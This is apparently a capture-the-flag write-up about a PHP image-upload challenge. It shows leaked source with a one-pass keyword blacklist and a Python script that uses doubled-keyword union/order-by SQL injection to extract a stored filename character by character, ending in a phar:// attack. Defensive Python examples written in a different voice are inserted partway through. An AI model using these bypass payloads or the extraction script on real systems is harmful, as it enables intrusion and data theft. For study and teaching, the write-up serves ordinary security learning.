To start with there is just a login and a registration page. No injection there.
After getting in, the URL looks like http://node3.buuoj.cn/index.php?file=index
Tried the PHP stream wrappers, but couldn't read the source that way. After registering and logging in there is an image download feature. Changing the ID to 2 throws an error, so the data is presumably being pulled from the database.
A plain union select won't download anything and just errors out; double-writing the keywords gets around it.
After that I pulled down all of the source.
index.php
```php
<?php
define("DIR_PERMITION", time());
include("config.php");
$_POST = d_addslashes($_POST);
$_GET = d_addslashes($_GET);
?>
```

```php
<?php
$file = isset($_GET['file']) ? $_GET['file'] : "home";
// echo $file;
if (preg_match('/\.\.|^[\s]*\/|^[\s]*php:|filter/i', $file)) {
    echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>";
    die();
}
$filename = $file . ".php";
if (!include($filename)) {
    if (!isset($_SESSION['username']) || !isset($_SESSION['userid'])) {
        header("Location: index.php?file=login");
        die();
    }
    // (the rest of this branch was not captured in the dump)
}
```
This is where the stream wrappers get filtered: `php:` and anything containing `filter` are blocked, along with `..` and a leading `/`.
config.php
```php
<?php
error_reporting(0);
session_start();
$dbhost = "127.0.0.1";
$dbuser = "admin";
$dbpass = "password987~!@";
$dbname = "dsqli";
$conn = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
$conn->query("set names utf8");

function d_addslashes($array) {
    foreach ($array as $key => $value) {
        if (!is_array($value)) {
            !get_magic_quotes_gpc() && $value = addslashes($value);
            $array[$key] = $value;
        } else {
            $array[$key] = d_addslashes($array[$key]);
        }
    }
    return $array;
}

function filter($id) {
    $id = strtolower($id);
    $id = str_replace('select', '', $id);
    $id = str_replace('update', '', $id);
    $id = str_replace('insert', '', $id);
    $id = str_replace('delete', '', $id);
    $id = str_replace('and', '', $id);
    $id = str_replace('or', '', $id);
    $id = str_replace('where', '', $id);
    $id = str_replace('union', '', $id);
    $id = str_replace('like', '', $id);
    $id = str_replace('regexp', '', $id);
    $id = str_replace('is', '', $id);
    $id = str_replace('=', '', $id);
    $id = str_replace(',', '', $id);
    $id = str_replace('|', '', $id);
    $id = str_replace('&', '', $id);
    $id = str_replace('!', '', $id);
    $id = str_replace('%', '', $id);
    $id = str_replace('^', '', $id);
    $id = str_replace('<', '', $id);
    $id = str_replace('>', '', $id);
    $id = str_replace('*', '', $id);
    $id = str_replace('(', '', $id);
    $id = str_replace(')', '', $id);
    return $id;
}

function random_str($length = "32") {
    $set = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
                 "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
                 "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $str = '';
    for ($i = 1; $i <= $length; ++$i) {
        $ch = mt_rand(0, count($set) - 1);
        $str .= $set[$ch];
    }
    return $str;
}
```
Everything is simply replaced with an empty string, in a single pass, which is why double-writing a keyword survives. But all of the symbols are filtered out as well.
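To make the point concrete, here is an added example (my own, not code from the writeup or the challenge): a Python port of the filter() above, a check that its output is not a fixed point (a second pass still finds keywords, so pieces left behind can reassemble a banned word), and the lookup the download page should have used instead: integer-validate the id, bind it as a parameter, and scope it to the logged-in uid. The names `challenge_filter`, `is_fixed_point`, `setup_db` and `lookup_location`, and the two sample rows, are all assumptions for this example.

```python
import sqlite3
from typing import Optional

# The keywords and symbols config.php deletes, in the same order. Each one is
# removed in a single pass and never re-checked.
BLACKLIST = [
    "select", "update", "insert", "delete", "and", "or", "where", "union",
    "like", "regexp", "is", "=", ",", "|", "&", "!", "%", "^", "<", ">",
    "*", "(", ")",
]

def challenge_filter(value: str) -> str:
    """Python port of filter() from config.php: lowercase, then delete each entry once."""
    value = value.lower()
    for word in BLACKLIST:
        value = value.replace(word, "")
    return value

def is_fixed_point(value: str) -> bool:
    """True when a second pass changes nothing. If the output of a deletion
    blacklist is not a fixed point, a banned word can be rebuilt from the pieces
    the first pass left behind."""
    once = challenge_filter(value)
    return challenge_filter(once) == once

def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's download table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table download (id integer primary key, uid integer, image_name text, location text)"
    )
    conn.executemany(
        "insert into download (uid, image_name, location) values (?, ?, ?)",
        [
            (1, "cat", "./Up10aDs/EXAMPLE_RANDOM_NAME_1.jpg"),  # constructed rows
            (2, "dog", "./Up10aDs/EXAMPLE_RANDOM_NAME_2.png"),
        ],
    )
    return conn

def lookup_location(conn: sqlite3.Connection, uid: int, image_id) -> Optional[str]:
    """Hardened lookup: the id must parse as an integer, is bound as a query
    parameter, and the row must belong to the logged-in uid. No string filtering."""
    try:
        image_id = int(image_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "select location from download where id = ? and uid = ?", (image_id, uid)
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    for probe in ("union", "ununionion", "oorrder"):
        print(repr(probe), "->", repr(challenge_filter(probe)),
              "fixed point:", is_fixed_point(probe))
    db = setup_db()
    print(lookup_location(db, 1, "1"), lookup_location(db, 1, "1 union select 1"))
```

The uid scoping matters as much as the parameter binding: even a perfectly clean integer id would otherwise let one user fetch another user's upload path.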
```php
<?php
defined("DIR_PERMITION") or die("Access denied!");
if (!isset($_SESSION['username']) || !isset($_SESSION['userid'])) {
    header("Location: index.php?file=login");
    die();
}
?>
<?php
if (isset($_FILES['file'])) {
    $seed = rand(0, getrandmax());
    mt_srand($seed);
    if ($_FILES["file"]["error"] > 0) {
        echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\">uplpad file error!:" . $_FILES["file"]["error"] . "</i></div>";
        die();
    }
    $fileTypeCheck = ((($_FILES["file"]["type"] == "image/gif")
        || ($_FILES["file"]["type"] == "image/jpeg")
        || ($_FILES["file"]["type"] == "image/pjpeg")
        || ($_FILES["file"]["type"] == "image/png"))
        && ($_FILES["file"]["size"] < 204800));
    $reg = '/^gif|jpg|jpeg|png$/';
    $fileExtensionCheck = !preg_match($reg, pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
    if ($fileExtensionCheck) {
        die("Only upload image file!");
    }
    if ($fileTypeCheck) {
        $fileOldName = addslashes(pathinfo($_FILES['file']['name'], PATHINFO_FILENAME));
        $fileNewName = './Up10aDs/' . random_str() . '.' . pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
        $userid = $_SESSION['userid'];
        $sql = "insert into download (uid, image_name, location) values ($userid,'$fileOldName','$fileNewName')";
        $res = $conn->query($sql);
        if ($res && move_uploaded_file($_FILES['file']['tmp_name'], $fileNewName)) {
            echo "<script>alert('file upload success!');window.location.href='index.php?file=home'</script>";
        } else {
            echo "<script>alert('file upload error')</script>";
        }
    } else {
        echo "<script>alert('file type error');</script>";
    }
}
?>
```
It first checks the MIME type and the extension, then renames the file to /Up10aDs/random_str().jpg
and inserts a row into the database. The table columns are uid, image_name, location.
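The upload handler trusts the client-supplied MIME type and the extension, and never looks at the bytes. As an added example (mine, not the challenge's code), here is the content check a defender would put in front of the move: a grouped, fully anchored extension allowlist, a magic-byte check that the content really is the declared image type, and a scan for a phar stub, since the phar:// wrapper only cares about the `__HALT_COMPILER();` stub inside the file and not about the extension. `check_upload`, `MAGIC`, `PHAR_STUB`, `EXT_OK` and the two sample byte strings are all assumptions constructed for this example.

```python
import re
from typing import Tuple

# Real file signatures for the image types the handler accepts.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# Every phar archive carries a stub ending in __HALT_COMPILER(); PHP's phar://
# wrapper keys on that stub, not on the file extension.
PHAR_STUB = re.compile(rb"__HALT_COMPILER\s*\(\s*\)", re.IGNORECASE)
# Grouped and anchored at both ends, so the whole extension must be one of these.
EXT_OK = re.compile(r"^(gif|jpe?g|png)$", re.IGNORECASE)

def check_upload(filename: str, data: bytes, max_size: int = 204800) -> Tuple[bool, str]:
    """Hypothetical server-side check; returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if not EXT_OK.match(ext):
        return False, "extension not allowed"
    if len(data) >= max_size:  # same 204800-byte limit as the handler
        return False, "file too large"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match extension"
    if PHAR_STUB.search(data):
        return False, "phar stub inside image"
    if b"<?php" in data.lower():
        return False, "php open tag inside image"
    return True, "ok"

# Constructed samples (not real uploads): a bare GIF header, and the same
# header followed by a phar-style stub.
SAMPLE_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16
SAMPLE_GIF_WITH_STUB = b"GIF89a" + b"<?php __HALT_COMPILER(); ?>" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in (("photo.gif", SAMPLE_GIF), ("photo.gif", SAMPLE_GIF_WITH_STUB)):
        print(name, check_upload(name, blob))
```

Signature and stub checks are cheap and catch the obvious cases; the stronger fix is to re-encode every accepted image with an image library so that nothing but pixel data survives, and to serve the upload directory with script execution and include() disabled.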
So we need that filename.
We can leak it with an order by injection:
```python
import requests

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
url = 'http://121.36.104.216:10091/downfile.php'
cookie = {"Cookie": "PHPSESSID=1b200f7ghvjujoep08vamco280"}
name = '0x2e2f557031306144732f'  # hex of "./Up10aDs/", the known prefix of the stored path
r = requests.session()
for a in range(200):
    for i in range(30, 130):
        data = {"image": "4 ununionion selselectect " + name + hex(i)[2:] + " oorrder by 1",
                "image_download": "%E6%94%B6%E8%97%8F"}
        result = r.post(url=url, data=data, headers=cookie, proxies=proxies).text
        # print(result)
        if 'eval' in result:
            name += hex(i - 1)[2:]
            print(chr(i - 1))
            break
```
With the filename injected out, the phar:// wrapper finishes the job.